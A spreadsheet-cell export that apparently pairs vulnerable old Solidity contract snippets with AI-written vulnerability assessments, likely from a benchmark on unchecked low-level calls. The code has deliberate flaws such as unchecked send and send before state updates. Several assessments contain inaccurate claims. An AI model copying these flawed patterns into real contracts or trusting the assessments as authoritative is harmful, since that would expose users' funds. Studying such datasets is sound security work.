         var decisionBlockNumber = getDecisionBlockNumber(roundIndex,subpotIndex);
         if(decisionBlockNumber&gt;block.number)
             return;
         if(rounds[roundIndex].isCashed[subpotIndex])
             return;
         //Subpots can only be cashed once. This is to prevent double payouts
         var winner = calculateWinner(roundIndex,subpotIndex);
         var subpot = getSubpot(roundIndex);
         winner.send(subpot);
         rounds[roundIndex].isCashed[subpotIndex] = true;
         //Mark the round as cashed
     }</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Yes.
2. Explain in details how this vulnerability can be exploited:
The "cash" function in the code sends funds to the winner. This operation is performed with the "send" method. The issue here is that the "send" method in Solidity only provides 2300 gas, which is not enough if the receiving contract falls back to a function that consumes more gas (for instance, if it does some state-changing operations). In this case, the send operation would fail, but the contract does not handle this failure. This could lead to funds being locked in the contract if the "send" operation always fails.
3. The business impact of this vulnerabilities in one sentence: 
The "cash" function leads to potential loss of funds or locking of funds in the contract due to the failure of the "send" operation.
4. The potential solutions of this vulnerabilities:
a. Use the "transfer" function instead of "send". The "transfer" function throws an exception if the call fails, reverting the state changes.
b. If sticking with "send" is necessary, always check the return value of "send". It returns false if the call fails, so you can add a require statement to revert the transaction if the sending of funds fails.
c. Another solution is to use a pattern called the "withdrawal pattern" or "pull payment pattern". Instead of pushing payments to the recipients, allow them to withdraw their funds themselves. This can prevent malicious contracts from causing your contract to get stuck when trying to send funds.
Note: To fully evaluate the vulnerabilities of this code, the complete contract code and the context in which this function is used should be reviewed.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
   a. **Use of `var` Keyword**: The `var` keyword is deprecated in recent versions of Solidity, and its use can lead to ambiguous types. It's recommended to use explicit types like `uint256`, `address`, etc. This isn't a direct security vulnerability, but it can lead to unexpected behavior if the types inferred by `var` are not what the developer intended.
   b. **Potential Reentrancy Attack**: The function sends Ether to an address with `winner.send(subpot);` before updating the state with `rounds[roundIndex].isCashed[subpotIndex] = true;`. This opens up the possibility for a reentrancy attack. A malicious contract can implement a fallback function that calls `cash` again before the original call to `cash` completes, potentially allowing for the subpot to be cashed out multiple times.
   c. **No Event Logging**: It's a best practice in Solidity to emit events for significant state changes, especially for financial transactions. This function lacks event emission after the `send` call, which could make it harder for frontend applications to monitor and react to the transaction.
   d. **Use of `send` Method Without Check**: The `send` method used to send Ether returns a boolean indicating success or failure. This return value is not checked in the code, which means the function won't know if the send operation failed. It's generally safer to use the `transfer` method or to check the result of the `send` method.
   e. **Lack of Access Control**: There doesn't seem to be any access control in the function to restrict who can call it. This might be intentional, but it's worth noting that anyone can attempt to call this function, which could lead to unnecessary gas usage or unintended behavior if not managed appropriately elsewhere in the contract.
In conclusion, while the code has vulnerabilities that can be exploited, these can be mitigated with a few improvements in the coding practices and design.</t>
  </si>
  <si>
    <t xml:space="preserve"> function() {
         //this is the function that gets called when people send money to the contract.
         var roundIndex = getRoundIndex();
         var value = msg.value-(msg.value%ticketPrice);
         if(value==0) return;
         if(value&lt;msg.value){
             msg.sender.send(msg.value-value);
         }
         //no partial tickets, send a partial refund
         var ticketsCount = value/ticketPrice;
         rounds[roundIndex].ticketsCount+=ticketsCount;
         if(rounds[roundIndex].ticketsCountByBuyer[msg.sender]==0){
             var buyersLength = rounds[roundIndex].buyers.length++;
             rounds[roundIndex].buyers[buyersLength] = msg.sender;
         }
         rounds[roundIndex].ticketsCountByBuyer[msg.sender]+=ticketsCount;
         rounds[roundIndex].ticketsCount+=ticketsCount;
         //keep track of the total tickets
         rounds[roundIndex].pot+=value;
         //keep track of the total pot
     }</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
a. **Reentrancy Attack**: The code uses the `msg.sender.send` function without any checks or a mutex mechanism in place. If `msg.sender` is a malicious contract, it can exploit this line to reenter the contract before it finishes executing. This is a classic reentrancy vulnerability.
b. **Overflows and Underflows**: The code lacks safe math checks. For instance, operations like `rounds[roundIndex].ticketsCount+=ticketsCount` can overflow if their values become too large, leading to unexpected behavior. The same applies to the `+=` operation on the pot value and others. Using SafeMath or equivalent libraries can mitigate these issues.
c. **Redundant State Change**: The code contains the line `rounds[roundIndex].ticketsCount+=ticketsCount;` twice. This is redundant and can lead to miscalculations or increased gas costs.
d. **Lack of Function Visibility**: The function doesn't specify whether it is `public`, `external`, `private`, or `internal`, which can lead to unexpected behaviors if not defined elsewhere in the contract.
e. **No Events Logging**: The function doesn't emit any events, which makes it hard for dApps or external systems to react to state changes. Logging events is a good practice in smart contracts.
f. **Lack of Checks**: The code lacks a check for the possibility that `ticketPrice` is 0, which would cause a division by zero in the calculation of `ticketsCount`.
These vulnerabilities can lead to unexpected behaviors, potential loss of funds, or other security issues. Proper checks, using established patterns, and testing can help mitigate these risks.</t>
  </si>
  <si>
    <t>Alright, I will review the uploaded Solidity code and analyze it for vulnerabilities. Let's start by examining the contents of the file.
The code appears to be a contract named "KingOfTheEtherThrone". It's designed to allow participants to claim the "throne" by sending Ether. Each time the throne is claimed, the price increases. The contract keeps track of the current monarch and a list of past monarchs. 
Before diving deeper, I'll outline some of the key components observed so far:
- There's a `Monarch` struct that stores details about the monarch, such as their address, name, claim price, and timestamp of their coronation.
- The contract has a `wizardAddress` that seems to have special privileges.
- There's a `onlywizard` modifier to restrict certain functions to the wizard.
- Constants like `startingClaimPrice`, `claimPriceAdjustNum`, `claimPriceAdjustDen`, `wizardCommissionFractionNum`, and `wizardCommissionFractionDen` are used to calculate the claim price and the commission for the wizard.
- Variables like `currentClaimPrice` and `currentMonarch` store the current state of the throne.
- A list `pastMonarchs` keeps track of previous throne holders.
I will now proceed to analyze the rest of the code to identify any potential vulnerabilities.
The provided section of the code contains the following key components:
1. **Constructor `KingOfTheEtherThrone()`**: Initializes the contract, sets the `wizardAddress` to the contract creator, and sets the initial `currentMonarch` to the wizard with a placeholder name "[Vacant]".
2. **Function `numberOfMonarchs()`**: Returns the number of past monarchs.
3. **Event `ThroneClaimed`**: An event that is emitted when the throne is claimed, which can be useful for front-end interactions.
4. **Fallback function**: It triggers the `claimThrone` function with the transaction's message data as the desired name.
5. **Function `claimThrone(string name)`**: Allows a user to claim the throne by sending the required Ether. Some key operations within this function include:
   - Checking if the sent amount is less than the `currentClaimPrice`. If so, it refunds the amount.
   - Checking if the sent amount is more than the `currentClaimPrice`. If so, it refunds the excess amount.
   - Calculating the commission for the wizard and sending the rest as compensation to the current monarch. If the throne is vacant (i.e., the current monarch is the wizard), the fee accumulates for the wizard.
   - The current monarch is replaced by the new claimant.
Now, let's analyze this section for potential vulnerabilities:
1. **Reentrancy Vulnerability**: The `claimThrone` function sends Ether to external addresses (`currentMonarch.etherAddress.send(compensation)`) before updating the state (`pastMonarchs.push(currentMonarch`). This can lead to a reentrancy attack if the `currentMonarch.etherAddress` is a malicious contract that calls `claimThrone` again before the state is updated. 
2. **Uncontrolled Gas Usage**: The function uses `.send()` to transfer Ether, which only provides a limited amount of gas (2300 gas). This may not be enough for certain operations and can lead to unexpected behavior. However, since `.send()` is generally considered safer against reentrancy than `.call()`, this point is more about ensuring the recipient can handle the gas stipend rather than a direct vulnerability.
3. **Unspecified Gas for `.send()`**: There's no check for the return value of `.send()`. If the send operation fails (e.g., due to the recipient contract's fallback function consuming more than 2300 gas), the Ether will not be transferred, but the contract will continue its execution.
Let's continue analyzing the rest of the code to check if there are any more vulnerabilities.
The continuation of the code includes:
1. **Updates to the `currentMonarch`**: After a successful claim, the previous monarch is added to the `pastMonarchs` list and the `currentMonarch` is updated to the new claimant.
2. **Claim Price Adjustment**: After a successful claim, the claim price for the throne is adjusted. The adjustment involves multiplying the current price by a factor (`claimPriceAdjustNum / claimPriceAdjustDen`) and then rounding it to avoid excessive decimal places. This rounding is based on predefined thresholds and ensures that the price is always in whole numbers of `szabo` or `finney` or `ether`.
3. **Event Emission**: The `ThroneClaimed` event is emitted, signaling that the throne has been claimed.
4. **Function `sweepCommission(uint amount)`**: Allows the wizard to collect their commission. It transfers the specified `amount` of Ether from the contract to the `wizardAddress`. This function can only be called by the wizard.
5. **Function `transferOwnership(address newOwner)`**: Allows the wizard to transfer the ownership (or wizard status) of the contract to another address. This function can also only be called by the wizard.
Vulnerability Analysis:
1. **Unspecified Gas for `.send()` in `sweepCommission`**: Similar to the previous section, the function uses `.send()` without checking its return value. If the send operation fails, the Ether will not be transferred, but the contract will continue its execution. This could lead to lost funds if not handled properly.
2. **Potential for Lost Funds**: If the wizard's address is a contract and its fallback function consumes more than the gas stipend provided by `.send()`, then the funds could be locked in the KingOfTheEtherThrone contract, as the `sweepCommission` function might consistently fail.
3. **Ownership Transfer without Validation**: The `transferOwnership` function doesn't have any validation checks. Although it's restricted to the wizard, a mistake could lead to the transfer of ownership to a zero address or an unintended address, potentially compromising the contract's control.
Summary:
- **Are there any vulnerabilities?** Yes
- **how this vulnerability can be exploited **:
  1. Reentrancy attack in the `claimThrone` function due to the state not being updated immediately after sending funds.
  2. Unspecified gas for `.send()`, leading to potential issues with the recipient's fallback function in both the `claimThrone` and `sweepCommission` functions.
  3. Potential for lost funds if the `wizardAddress` is a contract and its fallback function consumes too much gas.
  4. Ownership can be mistakenly transferred to an unintended address using `transferOwnership` due to the absence of validation checks.
It's essential to address these issues to ensure the security and correct functioning of the contract.</t>
  </si>
  <si>
    <t>Alright, let's start by examining the contents of the uploaded Solidity file named "king_of_the_ether_throne.sol". I'll read its content first.
The provided code appears to be a Solidity smart contract for a game called "King Of The Ether Throne". In this game, players can claim the throne by paying a certain amount of Ether. The smart contract manages the current monarch, the price to claim the throne, and the payment details.
1. Are there any unchecked low-level vulnerabilities? 
To determine this, I'll need to analyze the entire code for potential vulnerabilities such as reentrancy attacks, unchecked return values, and more.
I'll proceed with a deeper analysis of the provided code.
Let's break down the key parts of the contract and then look for vulnerabilities:
1. **State Variables &amp; Structs**: 
    - The contract defines a `Monarch` struct which has details like the Ethereum address, name, the price paid to claim the throne, and the timestamp of their rule.
    - There's a `wizardAddress` which seems to be a privileged address with special permissions.
    - `startingClaimPrice` is a constant that defines the initial price to claim the throne.
    - There are other variables and constants which will become clear as we go through the code.
2. **Modifiers**: 
    - `onlywizard` ensures that only the wizard can execute certain functions.
3. **Functions**: 
    - We need to look at each function in detail, especially those that handle Ether transactions, to check for vulnerabilities.
Common vulnerabilities in Ethereum smart contracts include:
- Reentrancy attacks
- Unchecked `send`/`call` return values
- Denial of Service (DoS) attacks
- Gas limit issues
- Underflows/Overflows (though these are typically mitigated by using SafeMath library or in newer versions of Solidity)
I will now proceed to analyze the complete code and look for the aforementioned vulnerabilities and any other potential issues.
Here are the functions extracted from the contract:
1. **Constructor `KingOfTheEtherThrone()`**: 
    - Initializes the `wizardAddress` with the address of the contract creator.
    - Sets the initial claim price for the throne.
    - Initializes the current monarch as the wizard with a claim price of 0.
2. **Function `numberOfMonarchs()`**: 
    - Returns the number of past monarchs.
3. **Fallback function**:
    - This unnamed function gets triggered when the contract receives Ether without a specific function call. It assumes the sent data is the name of the new monarch and attempts to claim the throne with that name.
4. **Function `claimThrone(string name)`**: 
    - Players can claim the throne by calling this function and sending Ether. If the sent amount is less than the `currentClaimPrice`, the Ether is refunded. The logic for updating the monarch and price seems to be truncated in the displayed snippet.
5. **Function `sweepCommission(uint amount) onlywizard`**: 
    - The wizard can withdraw a specified amount of Ether from the contract.
6. **Function `transferOwnership(address newOwner) onlywizard`**: 
    - Allows the wizard to transfer the wizard's privileges to a new address.
Now, let's analyze the potential vulnerabilities:
1. **Reentrancy Attack**: 
    - The function `claimThrone` has a `send` method to refund Ether to `msg.sender` if they didn't send enough. This is potentially vulnerable to a reentrancy attack if there are subsequent state changes or Ether transfers in the function after this `send`. We need to check the rest of the function to confirm.
2. **Unchecked Send/Call Return Values**: 
    - The `send` method in both `claimThrone` and `sweepCommission` functions doesn't check the return value. If the `send` fails (e.g., due to the recipient contract throwing an exception), the contract will not be aware. Using `send` is generally safer than `call` against reentrancy, but it's still a good practice to check the return value.
3. **Fallback Function**: 
    - The fallback function makes an external call to `claimThrone`, which might lead to unforeseen behavior if the calling context has a lot of data or if the gas provided is too low.
To provide a full assessment, I'd need to analyze the full content of the `claimThrone` function and any other parts that are not displayed in the snippet. For now:
1. Are there any unchecked low-level vulnerabilities? 
**Yes**
2. how this vulnerability can be exploited :
    - **Unchecked `send` Return Value**: In both the `claimThrone` and `sweepCommission` functions, the contract doesn't check the return value of the `send` method. If the `send` fails, the contract won't know, potentially leading to lost funds or incorrect logic.
    - **Potential Reentrancy Attack**: The `claimThrone` function might be susceptible to a reentrancy attack if there are state changes or Ether transfers after the `send` method. A malicious contract could exploit this by becoming the `msg.sender` and implementing a fallback function that calls `claimThrone` again before the first call completes.
    - **Fallback Function Issues**: The fallback function's external call to `claimThrone` might cause issues if the calling context has a large data payload or if the gas provided is insufficient.
Would you like to proceed with a more detailed analysis or any specific concerns?</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
   Yes.
2. Proof of concept of this vulnerability:
   The vulnerability lies in the use of the `send()` function to refund the excess ether paid by the user. The `send()` function is used to transfer ether, but it has a limited gas stipend, and if the receiver contract runs out of gas while processing the transfer, it will not be able to receive the funds. This can result in a denial-of-service (DoS) vulnerability, where an attacker could repeatedly send a small amount of excess ether and make the contract unable to receive the funds, effectively blocking legitimate claims and causing financial loss to the users.
3. The business impact of this vulnerability in one sentence:
   This function leads to denial-of-service vulnerability, blocking legitimate claims and causing potential financial loss to users.
4. Potential solutions of this vulnerability:
   a. Use `transfer()` instead of `send()` for transferring ether to ensure that any failure during the transfer will revert the transaction, preventing DoS attacks.
   b. Implement a withdrawal pattern, where users can explicitly withdraw their excess funds, rather than relying on automatic refunds, to avoid potential issues with the gas stipend of `send()`.
   c. Implement a circuit breaker or other mechanism to pause the functionality of the contract if an attack is detected, preventing further damage.</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/king_of_the_ether_throne.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function sweepCommission(uint amount) onlywizard {
        wizardAddress.send(amount);
    }</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Yes.
2. how this vulnerability can be exploited :
- The contract does not check if the `send()` function, used to transfer Ether, fails or not. In Solidity, `send()` only sends 2300 gas which might not be enough for the transaction to be successful, especially if the receiving contract has a fallback function with more than 2300 gas in execution. If the `send()` function fails, it returns false but does not throw an exception. Hence, ignoring the returned value from `send()` can lead to unexpected behavior.
3. The business impact of these vulnerabilities in one sentence:
- This unchecked `send()` function can lead to a loss of Ether if the transaction fails and the contract continues to execute as if it was successful.
4. The potential solutions of these vulnerabilities:
- A safer approach to send Ether is to use the `transfer()` function instead of `send()`. `transfer()` throws an exception when the transaction fails, so you don't need to manually check the return value.
- If you still want to use `send()`, always check the return value and handle the possible failure appropriately.
- Alternatively, the contract can implement a withdrawal pattern, where users withdraw funds from the contract instead of the contract sending funds immediately. This is the recommended way to send Ether as it avoids many of these problems.
Here is how you could apply these changes to the code:
```solidity
// Instead of msg.sender.send(valuePaid), use:
require(msg.sender.send(valuePaid), "Transfer failed");
// Instead of currentMonarch.etherAddress.send(compensation), use:
require(currentMonarch.etherAddress.send(compensation), "Transfer failed");
```
Or use the `transfer()` method:
```solidity
// Instead of msg.sender.send(valuePaid), use:
msg.sender.transfer(valuePaid);
// Instead of currentMonarch.etherAddress.send(compensation), use:
currentMonarch.etherAddress.transfer(compensation);
```
The withdrawal pattern would involve a more significant rewrite of the contract code, but it's the safest way to handle these kinds of transfers.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
   The code provided is a Solidity function designed to send `amount` of Ether to an address (`wizardAddress`). There are a couple of potential vulnerabilities or issues with this code:
   a. **Use of `.send()` without checking its return value**: In Solidity, the `.send()` method returns `false` if the send operation fails, rather than throwing an exception. The function does not check the return value of the `.send()` operation, which means it might silently fail, and the contract wouldn't be aware. It's typically safer to use the `.transfer()` method, which throws an exception if the send operation fails, or to check the return value of `.send()` and handle the failure case.
   b. **Lack of event logging**: There's no event that's emitted after the Ether transfer, which means it's harder to track and verify the transfer operation on the blockchain. It's a good practice to emit an event after significant operations like transfers to make interactions with the contract more transparent.
   c. **Possible reentrancy attack**: While the function itself doesn't immediately appear to be vulnerable to a reentrancy attack, it's worth noting that calling external contracts (like with `.send()`) can be a point of risk. If `wizardAddress` is a contract and not just an externally owned account, it can have a fallback function that gets executed when it receives Ether. This could potentially call `sweepCommission` again before the first call is finished. To prevent this, it's a good practice to use the checks-effects-interactions pattern and to consider using mechanisms like a reentrancy guard.
   d. **Limited access control**: The function uses an `onlywizard` modifier, which presumably restricts access to a specific address or set of addresses. However, the implementation of this modifier isn't provided, so it's crucial to ensure that it's correctly implemented to prevent unauthorized access.
In summary, while the function appears simple, there are multiple aspects to consider for ensuring its security and robustness.</t>
  </si>
  <si>
    <t xml:space="preserve">    function() {
        claimThrone(string(msg.data));
    }
    // Claim the throne for the given name by paying the currentClaimFee.
    function claimThrone(string name) {
        uint valuePaid = msg.value;
        // If they paid too little, reject claim and refund their money.
        if (valuePaid &lt; currentClaimPrice) {
            msg.sender.send(valuePaid);
            return;
        }
        // If they paid too much, continue with claim but refund the excess.
        if (valuePaid &gt; currentClaimPrice) {
            uint excessPaid = valuePaid - currentClaimPrice;
            msg.sender.send(excessPaid);
            valuePaid = valuePaid - excessPaid;
        }
        // The claim price payment goes to the current monarch as compensation
        // (with a commission held back for the wizard). We let the wizard's
        // payments accumulate to avoid wasting gas sending small fees.
        uint wizardCommission = (valuePaid * wizardCommissionFractionNum) / wizardCommissionFractionDen;
        uint compensation = valuePaid - wizardCommission;
        if (currentMonarch.etherAddress != wizardAddress) {
            currentMonarch.etherAddress.send(compensation);
        } else {
            // When the throne is vacant, the fee accumulates for the wizard.
        }
        // Usurp the current monarch, replacing them with the new one.
        pastMonarchs.push(currentMonarch);
        currentMonarch = Monarch(
            msg.sender,
            name,
            valuePaid,
            block.timestamp
        );
        // Increase the claim fee for next time.
        // Stop number of trailing decimals getting silly - we round it a bit.
        uint rawNewClaimPrice = currentClaimPrice * claimPriceAdjustNum / claimPriceAdjustDen;
        if (rawNewClaimPrice &lt; 10 finney) {
            currentClaimPrice = rawNewClaimPrice;
        } else if (rawNewClaimPrice &lt; 100 finney) {
            currentClaimPrice = 100 szabo * (rawNewClaimPrice / 100 szabo);
        } else if (rawNewClaimPrice &lt; 1 ether) {
            currentClaimPrice = 1 finney * (rawNewClaimPrice / 1 finney);
        } else if (rawNewClaimPrice &lt; 10 ether) {
            currentClaimPrice = 10 finney * (rawNewClaimPrice / 10 finney);
        } else if (rawNewClaimPrice &lt; 100 ether) {
            currentClaimPrice = 100 finney * (rawNewClaimPrice / 100 finney);
        } else if (rawNewClaimPrice &lt; 1000 ether) {
            currentClaimPrice = 1 ether * (rawNewClaimPrice / 1 ether);
        } else if (rawNewClaimPrice &lt; 10000 ether) {
            currentClaimPrice = 10 ether * (rawNewClaimPrice / 10 ether);
        } else {
            currentClaimPrice = rawNewClaimPrice;
        }
        // Hail the new monarch!
        ThroneClaimed(currentMonarch.etherAddress, currentMonarch.name, currentClaimPrice);
    }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
a. **Reentrancy Attack**: 
The code is vulnerable to reentrancy attacks due to the usage of `.send()` without first updating the contract state. Reentrancy attack occurs when an attacker can reenter and manipulate a contract before it completes its execution. The typical best practice to prevent this is to first change the state of a contract and then send funds.
Proof of Concept:
- The function `claimThrone` sends funds to `msg.sender` before updating the contract state. An attacker could recursively call the function (by using a fallback function) before the original call has completed. This could lead to unintended behavior or potentially drain funds.
b. **Lack of Input Validation**:
The first function `function() { claimThrone(string(msg.data)); }` accepts any input data and tries to convert it to a string. This can lead to unintended behavior if someone sends malformed data. Moreover, there is no visibility keyword specified for this function, which means it defaults to `public`.
Proof of Concept:
- An attacker might send malformed data to this function causing unexpected behavior.
c. **Missing Event Logs**:
The function sends ether in multiple places but does not always emit an event when doing so. Events provide transparency to users by allowing them to verify that the contract is behaving correctly. This isn't strictly a security vulnerability but can be considered a best practice.
Proof of Concept:
- In cases where ether is refunded or sent, there should be an event emitted to log this activity for transparency.
d. **Potential Underflow**:
The calculations like `valuePaid - excessPaid` can potentially underflow if not properly checked.
Proof of Concept:
- If due to some reason, `excessPaid` is greater than `valuePaid`, the subtraction will underflow, leading to a very large result.
Note: These vulnerabilities are identified based on the provided code snippet. The entire contract might have more vulnerabilities, or some of these vulnerabilities might be mitigated elsewhere in the contract. Proper testing and auditing are essential for any smart contract before deployment.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
a. **Unchecked Send**: The function uses the `send` method to transfer ether. If the `send` method fails (e.g., if the recipient is a contract with a fallback function that consumes more than 2300 gas, or if the recipient has run out of gas), it will return `false` but won't throw an error. This can lead to unintended behaviors if not handled. Specifically, the following lines of code are vulnerable:
```javascript
msg.sender.send(valuePaid);
msg.sender.send(excessPaid);
currentMonarch.etherAddress.send(compensation);
```
A more secure way to send ether is to use the `transfer` method, which throws an error if the send fails. Alternatively, if you choose to use the `send` method, always check its return value and handle failures appropriately.
b. **Reentrancy Attack**: The function sends ether before it updates its internal state. This can lead to potential reentrancy attacks, especially on these lines:
```javascript
currentMonarch.etherAddress.send(compensation);
```
Here's the potential flow:
- The `currentMonarch.etherAddress` is a malicious contract.
- When the function tries to send `compensation` to `currentMonarch.etherAddress`, the malicious contract's fallback function gets triggered.
- The fallback function calls `claimThrone` again before the first call is finished.
- This can lead to unexpected behaviors, including draining the contract's ether.
To prevent reentrancy attacks, always update the contract's state before sending ether.
c. **Gas Limit Issues**: The code has a potential for running out of gas if the array `pastMonarchs` becomes too large. Each time the throne is claimed, the current monarch is added to the `pastMonarchs` array. Over time, as more and more monarchs are added, the gas required to execute the `claimThrone` function might exceed the block gas limit.
d. **Fallback Function Abuse**: The code suggests that there is a way to invoke `claimThrone` via the fallback function by sending data with the transaction. However, using the fallback function for such complex logic can be risky, especially if the function might require more than the 2300 gas stipend provided to fallback functions. It's generally a good practice to avoid putting complex logic in fallback functions.
e. **Uninitialized Variables**: It's not clear from the provided code if all the necessary state variables (like `currentClaimPrice`, `wizardCommissionFractionNum`, `wizardCommissionFractionDen`, etc.) are properly initialized and managed. If they are not, this can lead to unintended behaviors. 
f. **Fixed Point Arithmetic**: The code seems to be performing arithmetic operations on fixed-point numbers (like calculating the `wizardCommission`). Solidity doesn't natively support fixed-point arithmetic, so there's potential for rounding errors or overflows/underflows.
To mitigate these vulnerabilities, consider using the SafeMath library for arithmetic operations, and always be cautious of the order of operations to prevent potential attacks and unintended behaviors.</t>
  </si>
  <si>
    <t>Alright, I will begin by examining the provided Solidity code, "lotto.sol", to identify if there are any vulnerabilities.
The provided Solidity code represents a lottery contract named "Lotto". Here's a brief overview:
1. The contract has a public variable `payedOut` that indicates if the winnings have been paid out.
2. The `winner` variable denotes the address of the winner.
3. The `winAmount` variable specifies the amount won.
4. The `sendToWinner()` function allows the transfer of `winAmount` to the `winner` address if the winnings have not been paid out yet.
5. The `withdrawLeftOver()` function allows anyone to withdraw the remaining balance from the contract if the winnings have already been paid out.
**Analysis**:
1. The code uses `send` to transfer ether. This method is known to be vulnerable to attacks if not used properly. Specifically, using `send` or `transfer` can lead to reentrancy attacks if not protected with the checks-effects-interactions pattern. However, in this specific code, reentrancy seems to be mitigated by setting `payedOut` before sending the funds.
2. The `withdrawLeftOver()` function allows anyone to withdraw the remaining balance of the contract. This could lead to unintended behavior where someone other than the contract owner or intended recipient can drain the contract funds.
**Response**:
1. Are there any vulnerabilities? **Yes**.
2. how this vulnerability can be exploited :
   - The use of `send` without the checks-effects-interactions pattern can lead to reentrancy attacks. However, the provided code appears to follow this pattern, mitigating the risk.
   - The `withdrawLeftOver()` function does not have any access control, allowing anyone to withdraw the contract's remaining balance after winnings have been paid out. This could be exploited by an attacker who observes that `payedOut` is set to `true` and quickly calls `withdrawLeftOver()` to drain any remaining funds.</t>
  </si>
  <si>
    <t>Alright, let's start by reviewing the provided Solidity code in the file `lotto.sol`. I'll display the contents of the file first to understand its structure and logic.
Here's a summary of the code:
The contract is called `Lotto`. It is written in Solidity with a version of ^0.4.18.
1. Variables:
   - `payedOut`: A public boolean variable to check if the winner has been paid or not.
   - `winner`: A public address variable to store the winner's Ethereum address.
   - `winAmount`: A public uint variable to store the amount the winner will receive.
2. Functions:
   - `sendToWinner()`: 
     - Checks if `payedOut` is false.
     - Sends the `winAmount` to the `winner`.
     - Sets `payedOut` to true.
   - `withdrawLeftOver()`:
     - Checks if `payedOut` is true.
     - Sends the remaining balance of the contract to the caller (`msg.sender`).
Analysis:
1. **Are there any unchecked low-level calls vulnerabilities?** 
Yes.
2. **how this vulnerability can be exploited :**
   - The function `sendToWinner()` uses the low-level `.send()` function to transfer funds. This function returns `false` if the transfer fails but does not revert the transaction. There is no check in place to handle this, which means that if the `.send()` fails, the `payedOut` variable will still be set to `true`, which could result in funds being locked in the contract.
   - The `withdrawLeftOver()` function has a similar vulnerability. If the `.send()` call fails, the transaction will not be reverted, and the caller might assume they received the funds, even if they did not.
   - Since there are no additional comments or context regarding the "extra functionality" mentioned in the contract, there could potentially be other vulnerabilities related to how the `winner` and `winAmount` are determined or set, but this cannot be determined from the provided code snippet.
To mitigate these vulnerabilities:
- Use the `.transfer()` method instead of `.send()` because `.transfer()` will throw an exception and revert the transaction if the call fails.
- Implement error handling for the `.send()` method to ensure that the state variables are only updated if the transfer is successful.</t>
  </si>
  <si>
    <t>1. Vulnerabilities: Yes
2. Proof of concept of this vulnerability: The vulnerability in the code is a potential reentrancy attack.
3. The business impact of this vulnerability in one sentence: The function leads to the risk of funds being drained from the contract by reentrant calls.
4. Potential solutions of this vulnerability:
   - Use the "Checks-Effects-Interactions" pattern to ensure critical state changes are made before any external calls.
   - Implement a withdrawal pattern to allow winners to withdraw their funds instead of sending funds directly to them.
   - Consider using the "transfer" or "send" functions, which provide some protection against reentrancy by limiting gas and disallowing further execution on failure.
   - Use the latest Solidity version to take advantage of security enhancements and best practices.
   - Conduct a comprehensive security audit to identify and address potential vulnerabilities.</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/lotto.sol</t>
  </si>
  <si>
    <t xml:space="preserve">     function sendToWinner() public {
         require(!payedOut);
         winner.send(winAmount);
         payedOut = true;
     }
</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? Yes.
2. Proof of concept of this vulnerability: 
The vulnerability lies in the `winner.send(winAmount);` line. This is because `send` only forwards 2300 gas, and if the `winner` is a contract that requires more than 2300 gas (for example, if it contains a fallback function), the send function will fail. Additionally, `send` does not raise an exception when the call fails; it just returns false. This means that the `payedOut` variable could be set to `true` even if the funds were not successfully transferred, which could lead to the funds becoming locked in the contract.
3. The business impact of this vulnerability in one sentence: 
The `sendToWinner` function leads to potential loss or locking of funds due to its failure to handle the failure of the `send` function.
4. The potential solutions of this vulnerability:
Replace `send` with `transfer`, which automatically throws an exception if the call fails, preventing `payedOut` from being set to `true` if the funds are not transferred successfully. Also, consider implementing a check to verify that `winner.send(winAmount)` was successful before setting `payedOut` to true. Here's an example of how you could modify the function to address this vulnerability:
```solidity
    function sendToWinner() public {
        require(!payedOut);
        (bool success, ) = winner.call{value: winAmount}("");
        require(success, "Transfer failed.");
        payedOut = true;
    }
```
In this revised version of the function, we use a low-level `.call` instead of `.send` or `.transfer`. `.call` is recommended as of Solidity 0.5.0 because it does not restrict the amount of gas available to the recipient, mitigating the risk of a failed transaction due to out-of-gas errors. We then check the `success` of the call and revert the transaction with an error message if it was not successful, ensuring that `payedOut` is only set to `true` if the transfer actually took place.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
The vulnerability in the provided code arises from the use of the `.send()` method to transfer ether. The `.send()` method only forwards a limited gas stipend (2300 gas) to the receiving contract. If the recipient is a contract, and its fallback function consumes more than 2300 gas (for instance, due to state changes, event emissions, or other logic), then the `.send()` call will fail. However, in the provided code, there's no check or handling for the failure of the `.send()` method. This means that if the `send()` fails, `payedOut` will still be set to `true`, potentially resulting in the `winAmount` being locked in the contract forever, since there is no mechanism to retry the payout.
A safer approach would be to use the `.call{value: winAmount}("")` method and check its return value, or to use a pattern like the "withdrawal pattern" (also known as the "pull payment" pattern), where the recipient initiates the withdrawal, allowing for retries in case of failure.</t>
  </si>
  <si>
    <t xml:space="preserve">     function withdrawLeftOver() public {
         require(payedOut);
         msg.sender.send(this.balance);
     }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The provided smart contract function `withdrawLeftOver` exhibits the following vulnerabilities:
a. **Reentrancy Attack**: The function uses `msg.sender.send(this.balance)` without first setting the balance to 0 or without any checks after the send operation. An attacker can use a fallback function in their contract to continuously call the `withdrawLeftOver` function, leading to a reentrancy attack. This can cause the contract to send more Ether than intended to the attacker.
b. **No Check on `payedOut` Value**: The function requires the `payedOut` value to be true but does not reset it afterward. This means if `payedOut` was set to true once, any address can call this function and attempt to drain the funds multiple times. 
c. **Use of `send` Without Checking Return Value**: The `send` function sends a limited amount of gas (2300 gas) and might fail if the recipient's fallback function consumes more than that. The contract does not check the return value of the `send` function, which means it won't be aware if the send operation fails.
For a more secure implementation:
- Consider using the Checks-Effects-Interactions pattern.
- Always check the return value of `send` or prefer using the `transfer` method.
- Reset or modify the condition (`payedOut`) after the action has been taken to prevent multiple unauthorized withdrawals.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
The provided function has two significant vulnerabilities:
